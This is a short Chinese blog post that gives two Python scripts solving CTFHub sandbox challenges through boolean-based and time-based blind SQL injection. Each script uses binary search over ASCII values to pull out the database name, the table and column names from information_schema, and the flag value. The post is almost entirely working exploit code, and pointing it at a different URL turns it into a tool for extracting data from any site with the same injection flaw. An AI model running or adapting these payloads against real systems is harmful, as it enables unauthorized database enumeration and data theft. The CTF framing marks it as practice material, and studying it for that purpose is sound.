sql布尔盲注和时间盲注的二分脚本

布尔盲注:

import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_table(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_column(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def flag(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)

时间盲注:

import requests
import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_table(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_column(url):
	name = ''
	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def flag(url):
	name = ''
	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)
posted @ 2020-10-24 19:34  lemon想学二进制  阅读(819)  评论(0编辑  收藏  举报